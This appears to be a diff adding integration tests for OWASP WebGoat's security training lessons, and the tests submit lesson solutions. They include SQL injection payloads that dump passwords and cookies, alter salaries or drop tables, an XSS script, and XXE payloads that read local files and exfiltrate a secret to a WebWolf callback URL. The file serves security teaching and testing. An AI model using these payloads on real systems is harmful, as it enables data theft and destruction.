checkAssignment(url("SqlInjectionAdvanced/attack6a"), params, true);
params.clear();
params.put(
"userid_6a",
"Smith' union select userid,user_name, user_name,user_name,password,cookie,userid from"
+ " user_system_data --");
checkAssignment(url("SqlInjectionAdvanced/attack6a"), params, true);
params.clear();
params.put("userid_6b", "passW0rD");
checkAssignment(url("SqlInjectionAdvanced/attack6b"), params, true);
params.clear();
params.put(
"question_0_solution",
"Solution 4: A statement has got values instead of a prepared statement");
params.put("question_1_solution", "Solution 3: ?");
params.put(
"question_2_solution",
"Solution 2: Prepared statements are compiled once by the database management system"
+ " waiting for input and are pre-compiled this way.");
params.put(
"question_3_solution",
"Solution 3: Placeholders can prevent that the users input gets attached to the SQL query"
+ " resulting in a seperation of code and data.");
params.put(
"question_4_solution",
"Solution 4: The database registers 'Robert' ); DROP TABLE Students;--'.");
checkAssignment(url("SqlInjectionAdvanced/quiz"), params, true);
checkResults("SqlInjectionAdvanced");
}
}

78
src/it/java/org/owasp/webgoat/integration/SqlInjectionLessonIntegrationTest.java Normal file
View File

@ -0,0 +1,78 @@
package org.owasp.webgoat.integration;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
public class SqlInjectionLessonIntegrationTest extends IntegrationTest {
public static final String sql_2 = "select department from employees where last_name='Franco'";
public static final String sql_3 =
"update employees set department='Sales' where last_name='Barnett'";
public static final String sql_4_drop = "alter table employees drop column phone";
public static final String sql_4_add = "alter table employees add column phone varchar(20)";
public static final String sql_5 = "grant select on grant_rights to unauthorized_user";
public static final String sql_9_account = " ' ";
public static final String sql_9_operator = "or";
public static final String sql_9_injection = "'1'='1";
public static final String sql_10_login_count = "2";
public static final String sql_10_userid = "1 or 1=1";
public static final String sql_11_a = "Smith' or '1' = '1";
public static final String sql_11_b = "3SL99A' or '1'='1";
public static final String sql_12_a = "Smith";
public static final String sql_12_b =
"3SL99A' ; update employees set salary= '100000' where last_name='Smith";
public static final String sql_13 = "%update% '; drop table access_log ; --'";
@Test
public void runTests() {
startLesson("SqlInjection");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("query", sql_2);
checkAssignment(url("SqlInjection/attack2"), params, true);
params.clear();
params.put("query", sql_3);
checkAssignment(url("SqlInjection/attack3"), params, true);
params.clear();
params.put("query", sql_4_add);
checkAssignment(url("SqlInjection/attack4"), params, true);
params.clear();
params.put("query", sql_5);
checkAssignment(url("SqlInjection/attack5"), params, true);
params.clear();
params.put("operator", sql_9_operator);
params.put("account", sql_9_account);
params.put("injection", sql_9_injection);
checkAssignment(url("SqlInjection/assignment5a"), params, true);
params.clear();
params.put("login_count", sql_10_login_count);
params.put("userid", sql_10_userid);
checkAssignment(url("SqlInjection/assignment5b"), params, true);
params.clear();
params.put("name", sql_11_a);
params.put("auth_tan", sql_11_b);
checkAssignment(url("SqlInjection/attack8"), params, true);
params.clear();
params.put("name", sql_12_a);
params.put("auth_tan", sql_12_b);
checkAssignment(url("SqlInjection/attack9"), params, true);
params.clear();
params.put("action_string", sql_13);
checkAssignment(url("SqlInjection/attack10"), params, true);
checkResults("SqlInjection");
}
}

85
src/it/java/org/owasp/webgoat/integration/SqlInjectionMitigationIntegrationTest.java Normal file
View File

@ -0,0 +1,85 @@
package org.owasp.webgoat.integration;
import static org.hamcrest.CoreMatchers.containsString;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
public class SqlInjectionMitigationIntegrationTest extends IntegrationTest {
@Test
public void runTests() {
startLesson("SqlInjectionMitigations");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("field1", "getConnection");
params.put("field2", "PreparedStatement prep");
params.put("field3", "prepareStatement");
params.put("field4", "?");
params.put("field5", "?");
params.put("field6", "prep.setString(1,\"\")");
params.put("field7", "prep.setString(2,\\\"\\\")");
checkAssignment(url("SqlInjectionMitigations/attack10a"), params, true);
params.put(
"editor",
"try {\r\n"
+ " Connection conn = DriverManager.getConnection(DBURL,DBUSER,DBPW);\r\n"
+ " PreparedStatement prep = conn.prepareStatement(\"select id from users where name"
+ " = ?\");\r\n"
+ " prep.setString(1,\"me\");\r\n"
+ " prep.execute();\r\n"
+ " System.out.println(conn); //should output 'null'\r\n"
+ "} catch (Exception e) {\r\n"
+ " System.out.println(\"Oops. Something went wrong!\");\r\n"
+ "}");
checkAssignment(url("SqlInjectionMitigations/attack10b"), params, true);
params.clear();
params.put(
"userid_sql_only_input_validation", "Smith';SELECT/**/*/**/from/**/user_system_data;--");
checkAssignment(url("SqlOnlyInputValidation/attack"), params, true);
params.clear();
params.put(
"userid_sql_only_input_validation_on_keywords",
"Smith';SESELECTLECT/**/*/**/FRFROMOM/**/user_system_data;--");
checkAssignment(url("SqlOnlyInputValidationOnKeywords/attack"), params, true);
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON)
.get(
url(
"SqlInjectionMitigations/servers?column=(case when (true) then hostname"
+ " else id end)"))
.then()
.statusCode(200);
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON)
.get(url("SqlInjectionMitigations/servers?column=unknown"))
.then()
.statusCode(500)
.body(
"trace",
containsString(
"select id, hostname, ip, mac, status, description from SERVERS where status <>"
+ " 'out of order' order by"));
params.clear();
params.put("ip", "104.130.219.202");
checkAssignment(url("SqlInjectionMitigations/attack12a"), params, true);
checkResults("SqlInjectionMitigations");
}
}

77
src/it/java/org/owasp/webgoat/integration/WebWolfIntegrationTest.java Normal file
View File

@ -0,0 +1,77 @@
package org.owasp.webgoat.integration;
import static org.junit.jupiter.api.Assertions.assertTrue;
import io.restassured.RestAssured;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
public class WebWolfIntegrationTest extends IntegrationTest {
@Test
public void runTests() {
startLesson("WebWolfIntroduction");
// Assignment 3
Map<String, Object> params = new HashMap<>();
params.put("email", this.getUser() + "@webgoat.org");
checkAssignment(url("WebWolf/mail/send"), params, false);
String responseBody =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("mail").build())
.then()
.extract()
.response()
.getBody()
.asString();
String uniqueCode = responseBody.replace("%20", " ");
uniqueCode =
uniqueCode.substring(
21 + uniqueCode.lastIndexOf("your unique code is: "),
uniqueCode.lastIndexOf("your unique code is: ") + (21 + this.getUser().length()));
params.clear();
params.put("uniqueCode", uniqueCode);
checkAssignment(url("WebWolf/mail"), params, true);
// Assignment 4
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.queryParams(params)
.get(url("WebWolf/landing/password-reset"))
.then()
.statusCode(200);
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.queryParams(params)
.get(new WebWolfUrlBuilder().path("landing").build())
.then()
.statusCode(200);
responseBody =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("requests").build())
.then()
.extract()
.response()
.getBody()
.asString();
assertTrue(responseBody.contains(uniqueCode));
params.clear();
params.put("uniqueCode", uniqueCode);
checkAssignment(url("WebWolf/landing"), params, true);
checkResults("WebWolfIntroduction");
}
}

116
src/it/java/org/owasp/webgoat/integration/XSSIntegrationTest.java Normal file
View File

@ -0,0 +1,116 @@
package org.owasp.webgoat.integration;
import io.restassured.RestAssured;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
public class XSSIntegrationTest extends IntegrationTest {
@Test
public void crossSiteScriptingAssignments() {
startLesson("CrossSiteScripting");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("checkboxAttack1", "value");
checkAssignment(url("CrossSiteScripting/attack1"), params, true);
params.clear();
params.put("QTY1", "1");
params.put("QTY2", "1");
params.put("QTY3", "1");
params.put("QTY4", "1");
params.put("field1", "<script>alert('XSS+Test')</script>");
params.put("field2", "111");
checkAssignmentWithGet(url("CrossSiteScripting/attack5a"), params, true);
params.clear();
params.put("DOMTestRoute", "start.mvc#test");
checkAssignment(url("CrossSiteScripting/attack6a"), params, true);
params.clear();
params.put("param1", "42");
params.put("param2", "24");
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("webgoat-requested-by", "dom-xss-vuln")
.header("X-Requested-With", "XMLHttpRequest")
.formParams(params)
.post(url("CrossSiteScripting/phone-home-xss"))
.then()
.statusCode(200)
.extract()
.path("output");
String secretNumber = result.substring("phoneHome Response is ".length());
params.clear();
params.put("successMessage", secretNumber);
checkAssignment(url("CrossSiteScripting/dom-follow-up"), params, true);
params.clear();
params.put(
"question_0_solution",
"Solution 4: No because the browser trusts the website if it is acknowledged trusted, then"
+ " the browser does not know that the script is malicious.");
params.put(
"question_1_solution",
"Solution 3: The data is included in dynamic content that is sent to a web user without"
+ " being validated for malicious content.");
params.put(
"question_2_solution",
"Solution 1: The script is permanently stored on the server and the victim gets the"
+ " malicious script when requesting information from the server.");
params.put(
"question_3_solution",
"Solution 2: They reflect the injected script off the web server. That occurs when input"
+ " sent to the web server is part of the request.");
params.put(
"question_4_solution",
"Solution 4: No there are many other ways. Like HTML, Flash or any other type of code that"
+ " the browser executes.");
checkAssignment(url("CrossSiteScripting/quiz"), params, true);
params.clear();
params.put(
"editor",
"<%@ taglib uri=\"https://www.owasp.org/index.php/OWASP_Java_Encoder_Project\" %>"
+ "<html>"
+ "<head>"
+ "<title>Using GET and POST Method to Read Form Data</title>"
+ "</head>"
+ "<body>"
+ "<h1>Using POST Method to Read Form Data</h1>"
+ "<table>"
+ "<tbody>"
+ "<tr>"
+ "<td><b>First Name:</b></td>"
+ "<td>${e:forHtml(param.first_name)}</td>"
+ "</tr>"
+ "<tr>"
+ "<td><b>Last Name:</b></td>"
+ "<td>${e:forHtml(param.last_name)}</td>"
+ "</tr>"
+ "</tbody>"
+ "</table>"
+ "</body>"
+ "</html>");
checkAssignment(url("CrossSiteScripting/attack3"), params, true);
params.clear();
params.put(
"editor2",
"Policy.getInstance(\"antisamy-slashdot.xml\");"
+ "Sammy s = new AntiSamy();"
+ "s.scan(newComment,\"\");"
+ "CleanResults();"
+ "MyCommentDAO.addComment(threadID, userID).getCleanHTML());");
checkAssignment(url("CrossSiteScripting/attack4"), params, true);
checkResults("CrossSiteScripting");
}
}

117
src/it/java/org/owasp/webgoat/integration/XXEIntegrationTest.java Normal file
View File

@ -0,0 +1,117 @@
package org.owasp.webgoat.integration;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import java.io.IOException;
import org.junit.jupiter.api.Test;
public class XXEIntegrationTest extends IntegrationTest {
private static final String xxe3 =
"""
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>
""";
private static final String xxe4 =
"""
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>
""";
private static final String dtd7 =
"""
<?xml version="1.0" encoding="UTF-8"?><!ENTITY % file SYSTEM "file:SECRET"><!ENTITY % all "<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>">%all;
""";
private static final String xxe7 =
"""
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "WEBWOLFURL/USERNAME/blind.dtd">%remote;]><comment><text>test&send;</text></comment>
""";
private String webGoatHomeDirectory;
// TODO fix me
// /*
// * This test is to verify that all is secure when XXE security patch is applied.
// */
// @Test
// public void xxeSecure() throws IOException {
// startLesson("XXE");
// webGoatHomeDirectory = webGoatServerDirectory();
// RestAssured.given()
// .when()
// .relaxedHTTPSValidation()
// .cookie("JSESSIONID", getWebGoatCookie())
// .get(url("service/enable-security.mvc"))
// .then()
// .statusCode(200);
// checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, false);
// checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, false);
// checkAssignment(
// url("xxe/blind"),
// ContentType.XML,
// "<comment><text>" + getSecret() + "</text></comment>",
// false);
// }
/**
* This performs the steps of the exercise before the secret can be committed in the final step.
*
* @return
*/
private String getSecret() {
String secretFile = webGoatHomeDirectory.concat("/XXE/" + getUser() + "/secret.txt");
String webWolfCallback = new WebWolfUrlBuilder().path("landing").attackMode().build();
String dtd7String = dtd7.replace("WEBWOLFURL", webWolfCallback).replace("SECRET", secretFile);
// upload DTD
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.multiPart("file", "blind.dtd", dtd7String.getBytes())
.post(new WebWolfUrlBuilder().path("fileupload").build())
.then()
.extract()
.response()
.getBody()
.asString();
// upload attack
String xxe7String =
xxe7.replace("WEBWOLFURL", new WebWolfUrlBuilder().attackMode().path("files").build())
.replace("USERNAME", this.getUser());
checkAssignment(url("xxe/blind"), ContentType.XML, xxe7String, false);
// read results from WebWolf
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("requests").build())
.then()
.extract()
.response()
.getBody()
.asString();
result = result.replace("%20", " ");
if (-1 != result.lastIndexOf("WebGoat 8.0 rocks... (")) {
result =
result.substring(
result.lastIndexOf("WebGoat 8.0 rocks... ("),
result.lastIndexOf("WebGoat 8.0 rocks... (") + 33);
}
return result;
}
@Test
public void runTests() throws IOException {
startLesson("XXE", true);
webGoatHomeDirectory = webGoatServerDirectory();
checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, true);
checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, true);
checkAssignment(
url("xxe/blind"),
ContentType.XML,
"<comment><text>" + getSecret() + "</text></comment>",
true);
checkResults("XXE");
}
}